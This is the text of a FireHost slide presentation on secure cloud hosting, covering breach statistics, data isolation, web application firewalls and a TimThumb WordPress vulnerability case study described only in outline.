secure cloud hosting: real requirements to protect your data

Chris HinkleySenior Security Engineer

www.firehost.com@incrediblehink

Secure Cloud Hosting

Real RequirementsTo Protect Your Data

Secure Cloud Hosting: Real Requirements to Protect Your Data

Cloud computing provides computation, software, data

access, and storage services that do not require end-user

knowledge of the physical location and configuration of the

system that delivers the services.

WHAT IS THE CLOUD?

One Word, Infinite Definitions

Cloud computing provides computation, software, data

access, and storage services that do not require end-user

knowledge of the physical location and configuration of the

system that delivers the services.

A virtualized, multi-tenant infrastructure,

providing customers with architectural agility,

instant scalability and environmental security.

the secure cloud /THē siˈkyo$ or kloud/

Secure Cloud Hosting: Real Requirements to Protect Your Data

•Cost savings with virtualization

•Getting out the Hardware and software management business

•Ease and speed of scaling

•Niche cloud service providers that are specializing in secure cloud hosting

WHY THE CLOUD?

It Far Outweighs The Alternatives

Secure Cloud Hosting: Real Requirements to Protect Your Data

WHO IS MOVING TO THE CLOUD?

Google Trends

•Google Trend Screens

Scale is based on the average search traffic in the World

Cloud Hosting

Cloud Security

Search Volume ON THE RISE

Secure Cloud Hosting: Real Requirements to Protect Your Data

WHO IS MOVING TO THE CLOUD?

Google Trends

Scale is based on the average search traffic in the World

Dedicated Hosting

Search Volume ON THE DECLINE

Secure Cloud Hosting: Real Requirements to Protect Your Data

CAN THE CLOUD BE SECURE?

Just The Facts Please

48%34%16%

76%14%6%

5%

InternalExternalCo-Located

1% Mobile

N/A

2% Unknown

InternalExternalCo-ManagedN/A

2% Unknown

6%

Location/Hosting of assets by percent of breaches*

Management of assets by percent of breaches*

*Verizon caseload only

We are often asked whether the Cloud factors into many of the breaches we investigate. The easy answer is No–not really. It’s more about giving up control of our assets and data (and not controlling the associated risk) than any technology specific to the Cloud. ”

“

Secure Cloud Hosting: Real Requirements to Protect Your Data

CAN THE CLOUD BE SECURE?

Just The Facts Please

83%

Attack targeting by percent of breaches*

*Verizon caseload only

17%

Opportunistic

Targeted

49%Low37%

Medium

8% 6%

Attack difficulty by percent of breaches*

High None

Given the industry’s hyper-focus on cloud computing, we do our best to track relevant details during breach investigations and subsequent analysis. We have yet to see a breach involving a successful attack against the hypervisor.

“”

Secure Cloud Hosting: Real Requirements to Protect Your Data

•Network Traffic Separation

•Virtual Machine Isolation

•Storage Separation

•Multi-tenant Security Devices

HOW CAN YOU CREATE ISOLATION?

Separating Your Data

Secure Cloud Hosting: Real Requirements to Protect Your Data

KEEPING HACKERS AT BAY

Protecting Your Web Application

•Security in your SDLC

•Code Review

•Vulnerability Scanning

•Penetration Testing

•Change Management

Secure Cloud Hosting: Real Requirements to Protect Your Data

SECURITY IN DEPTH

Web Application Firewalls

•Security in Depth

•Firewalls=sledgehammer

•WAFs=scalpel

•Signatures and Profiling

•Virtual Patching

•0-day Mitigation

Secure Cloud Hosting: Real Requirements to Protect Your Data

CASE STUDY

TimThumb Wordpress Plugin

•Image Resizing Plugin for Wordpress Blogs

•Included In Many Themes

•0-Day Remote File Include Exploit

•Flawed Logic allowed trivial RFI

13

Secure Cloud Hosting: Real Requirements to Protect Your Data

FIX ALL THE THINGS

Virtually Instant Patching

•Applying a single ‘patch’ Secured Many

•Allowed Adequate Time

•Provided Security / Preserved Functionality

Secure Cloud Hosting: Real Requirements to Protect Your Data

•Traditional infrastructure is no more secure than the cloud.

•Tackle the low-hanging fruit first.

•Your application evolves. So should your security.

IN CONCLUSION

Cloud Security Is Not A Myth

Thank YouQuestions?

Email chris.hinkley@firehost.com

Twitter twitter.com/FireHost

Chris Hinkley